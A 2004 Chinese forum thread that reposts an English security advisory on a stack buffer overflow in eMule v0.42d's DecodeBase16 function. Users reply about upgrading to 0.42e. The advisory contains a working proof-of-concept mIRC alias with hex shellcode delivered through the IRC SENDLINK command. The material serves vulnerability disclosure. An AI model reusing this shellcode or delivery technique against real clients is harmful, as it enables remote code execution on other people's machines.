搜索 社区服务 统计排行 帮助
  • 1463阅读
  • 15回复

[重要]eMule v0.42d的用户要多注意哦,有个重要的漏洞被公布了

楼层直达
级别: 新手上路
注册时间:
2003-02-22
在线时间:
0小时
发帖:
107
希望没有人中招

eMule v0.42d Buffer Overflow

Description
-----------

A vulnerability exists in eMule v0.42d (and probably earlier versions)
in the DecodeBase16(...) function. This function takes an hexadecimal
string, its length, and a destination buffer (on the stack) as
parameters. The function decodes whatever is supplied, no length check
is performed on the string nor on the buffer, leading to a possible
stack overflow.

The function is called 5 times in the code: 3 times in the web server
(which may require authentication) and 2 times in the IRC client (not
connected by default).

uchar userid[16];
DecodeBase16(hash.GetBuffer(),hash.GetLength(),userid);

Proof of concept
----------------

Bourriquet is an mIRC alias exploiting this overflow in v0.42d via the
SENDLINK command, it calls MessageBoxA (to display 'Patch your eMule !')
and then ExitProcess :

/bourriquet { .quote PRIVMSG $1
$+(:,$chr(1),SENDLINK|,90909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090EB0790907AF65700906681EC400031C96820210000684D756C656875722065686820796F685061746389E2515152513EFF15C0E76100503EFF1568E461009090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090,|,$chr(1))

}

Developer response
------------------

The flaw was reported to bluecow from the eMule Team on March, 30th
2004 on IRC. He stated the issue would be patched in the upcoming eMule
release, available here:
http://www.emule-project.net/home/perl/news.cgi?l=1&cat_id=22

An effort was also done in changing the IRC server address and kicking
out vulnerable clients (nice work :)

Solution/Workaround
-------------------

The following options are available:
- upgrade to eMule version 0.42e,
- do not use the eMule web server and IRC client,
- uninstall eMule :)

Credits
-------

The vulnerability was discovered by Kostya Kortchinsky, from CERT
RENATER, on March 24th 2004, following a FHP meeting and a remark from
nico : "eMule and all these P2P tools are better than VNC to get remote
access to a box".

Greetings to the people of the French Honeynet Project, MISC Magazine
and #fee1dead@EFnet.

Advertising
-----------

CanSecWest/core04 : Top security experts. Cutting edge techniques and
information.
Vancouver, Canada - April 21-23 2004 - http://cansecwest.com

Symposium sur la S閏urit?des Technologies de l'Information et des
Communications
Rennes, France - June 2-4 2004 - http://sstic.org

See you there,

Kostya.
级别: 新手上路
注册时间:
2003-02-22
在线时间:
0小时
发帖:
107
只看该作者 1楼 发表于: 2004-04-19
虽然迟了点 - -a
不过应该能避免大家受伤害
级别: 风云使者
注册时间:
2001-11-21
在线时间:
0小时
发帖:
6962
只看该作者 2楼 发表于: 2004-04-19
看不懂,哪个上来翻译一下,翻译软件翻的莫名其妙

风清云淡
级别: 侠客
注册时间:
2003-12-31
在线时间:
0小时
发帖:
664
只看该作者 3楼 发表于: 2004-04-19
还好还好,还没中招
级别: 新手上路
注册时间:
2003-10-01
在线时间:
0小时
发帖:
153
只看该作者 4楼 发表于: 2004-04-19
还好我用的是emule v0.42e大概没事吧。
级别: 圣骑士
注册时间:
2003-04-13
在线时间:
21小时
发帖:
1669
只看该作者 5楼 发表于: 2004-04-19
還好我用Plus版的呢~

有事請pm我!   我的廢棄日記 ← 請多多光臨! <(_ _)>

----------------------

-E-D-2-K-----歡-迎-加-為-好-友-!-------
[KOR][TLF][eDtoon][CHN]rt87
[eDtoon][popgo][dmhy][TLF][CHN][KOR][ARC]roytam1
------------------------------
我的Winamp正在播放的歌曲:
级别: 精灵王
注册时间:
2002-07-19
在线时间:
8小时
发帖:
2723
只看该作者 6楼 发表于: 2004-04-19
估计我中招了 无缘无故会出现错误然后关闭

lakcom[eDtoon][popgo][CHN][VeryCD]
相聚一刻|音无 惚一郎|一瀨 花枝|二阶堂 望|三鹰 瞬|四谷 菊千带|五代 裕作|六本木 朱美|七尾 须惠|八神 吹雪|九条 明日菜|千草 响子|

我喜欢的女孩…很会吃醋、又性急、爱哭、易怒。但是,她的微笑…就是我最大的幸福…
级别: 新手上路
注册时间:
2003-06-19
在线时间:
0小时
发帖:
55
只看该作者 7楼 发表于: 2004-04-19
有最新版就升级啊,这样就不怕了

有人说:“灌够买密码的钱就好”
我说:“我不知灌,ed我就满足了”
级别: 圣骑士
注册时间:
2001-11-21
在线时间:
0小时
发帖:
2105
只看该作者 8楼 发表于: 2004-04-19
我也是用0.42e的
應該沒事吧
级别: 天使
注册时间:
2002-06-28
在线时间:
3402小时
发帖:
36494
只看该作者 9楼 发表于: 2004-04-19
DecodeBase16(...)函数的问题,
这个函数使用一个16位字符串,串的长度,和一个buffer作参数
由于函数没有做长度校验,可能导致栈溢出

这个函数被调用5次,3次用于web server
2次IRC client

级别: 光明使者
注册时间:
2003-02-27
在线时间:
0小时
发帖:
26477
只看该作者 10楼 发表于: 2004-04-19
不是出到0.42e了、更新應該就行啦
雖然我是用plus的~~~~~~

貴方の剣となり、敵を討ち、御身を守った。……この約束を、果たせてよかった

最後に、一つだけ伝えないと

シロウ────貴方を、愛している

级别: 工作组
注册时间:
2002-05-19
在线时间:
0小时
发帖:
6900
只看该作者 11楼 发表于: 2004-04-19
引用
最初由 atkio 发布
DecodeBase16(...)函数的问题,
这个函数使用一个16位字符串,串的长度,和一个buffer作参数
由于函数没有做长度校验,可能导致栈溢出

这个函数被调用5次,3次用于web server
2次IRC client


你的签名图让人怀念啊,Dune 2和命运之手系列。

拿别人的硬盘,迟早要还的…… =_=
级别: 骑士
注册时间:
2003-03-23
在线时间:
2小时
发帖:
787
只看该作者 12楼 发表于: 2004-04-20
e版有没有修正d的这个错误啊?!~◎#!

级别: 新手上路
注册时间:
2003-02-22
在线时间:
0小时
发帖:
107
只看该作者 13楼 发表于: 2004-04-21
引用
最初由 xymtm 发布
e版有没有修正d的这个错误啊?!~◎#!

应该有修正,反正我没用web,irc功能:D 祈祷吧这位同学:p
级别: 骑士
注册时间:
2003-08-27
在线时间:
1小时
发帖:
911
只看该作者 14楼 发表于: 2004-04-21
我用的是漫游的光速驴,应该没事吧?从没用过EM的WEB和IRC功能

EM疯狂上传中
快速回复

限150 字节
上一个 下一个